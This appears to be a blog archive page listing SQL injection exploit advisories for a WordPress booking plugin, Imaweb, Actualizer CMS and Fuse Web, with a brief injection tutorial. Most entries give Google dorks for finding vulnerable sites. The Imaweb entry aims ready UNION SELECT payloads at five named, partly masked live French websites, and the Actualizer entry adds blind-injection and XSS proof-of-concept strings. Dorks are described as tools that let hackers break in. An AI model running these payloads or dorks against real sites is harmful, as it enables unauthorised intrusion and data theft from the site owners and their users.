sqli

WordPress Booking System SQL Injection vulnerable

By |May 27th, 2014|

Exploit Title: WordPress Booking System (Booking Calendar) plugin SQL Injection
Release Date: 2014-05-21
Author: maodun
Contact: Twitter: @conmancm
Software Link: http://wordpress.org/support/plugin/booking-system
Affected version: < 1.3
Google Dork: inurl:/wp-content/plugins/booking-system/
REF: CVE-2014-3210

Introduction:
Booking System is great for booking hotel rooms, apartments, houses,
villas, rooms etc, make appointments to doctors, dentists, lawyers,
beauty salons, spas, massage therapists etc or schedule events.

SQLi – Proof Of Concept:
vulnerable path:
/wp-content/plugins/booking-system/dopbs-backend-forms.php
vulnerable parameter: $_POST['booking_form_id']
POC:
POST […]


Imaweb SQL injection Vulnerability

By |December 30th, 2013|

Exploit Title : imaweb SQL injection vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://www.imaweb.fr
Google Dork : intext:Réalisation du site Internet par Imaweb
Date: 2013-12-25
Tested on: Windows 7
discovered by : ACC3SS

Location :
localhost/public/index.php?act=photo_afficher&code=pub_phototheque2&num=[Sql Injection]
Demo:
http://www.avajaXXn.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version(),4,5,6,7--
http://www.auzXay.fr//public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version(),4,5,6,7--
http://www.roumeXgoux.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version(),4,5,6,7--
http://www.oxygXeneinsertion.fr/public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version(),4,5,6,7--
http://www.petXersbach.fr//public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,version(),4,5,6,7--


Google Dorks For SQL Injection

By |October 10th, 2013|

1500+ Google dorks for SQL injection.
Definition of Google dorks: advanced Google searches used to find security loopholes on websites and allow hackers to break into or disrupt the site.

list below:



Actualizer CMS – Multiple Vulnerabilities

By |October 10th, 2013|

Title: Actualizer CMS – Multiple Vulnerabilities
Date: 22.09.2013
Tested on: Linux 3.0 – 3.9 (95%)
Vendor: actualizer.pl
Dork: intext:"Powered by Actualizer & Heuristic"
Contact: [email protected]

1. Blind SQL Injection
host/galeria/galeria-2/gal,1'%20or%20'1'='2.html - false
host/galeria/galeria-2/gal,1'%20or%20'1'='1.html - true
PoC:
http://site/galeria/galeria-2/gal,1'%20or%20'1'='2.html
2. Cross Site Scripting
host/katalog/nowosci/archiwum/year,"xss
PoC:
site/katalog/nowosci/archiwum/year,"xss
3. Full Path Disclosure
host/newsletter.php
POST: action=save&cat=666%email[][email protected]&imie=devil

host/konto/rejestracja
POST (multipart): login=1


Basic SQL Injection Tutorial part-1

By |October 8th, 2013|

According to OWASP, SQL injection is the most common technique used by hackers to deface a website. SQL injection is a technique in which the hacker inserts SQL code into a web form to get sensitive information (such as user names and passwords). I will explain the various types of SQL injection.

Things You Should Know
Database: In simple words, a database is a collection of data.
Database […]


Fuse Web SQL Injection Vulnerability

By |October 6th, 2013|

Exploit Title: Fuse Web SQL Injection Vulnerability

Exploit Author: Ashiyane Digital Security Team
Discovered By : ACC3SS
Software Link : http://www.fuse.no
Google Dork: intext:"Powered by Fuse Web"
Tested on: Windows,Linux
Date : 2013/09/14

Location :
127.0.0.1/path/?HovedMenyId=&InnholdMenyId=&Mode=[Sql Injection]
Proof:
 
source:cxsecurity
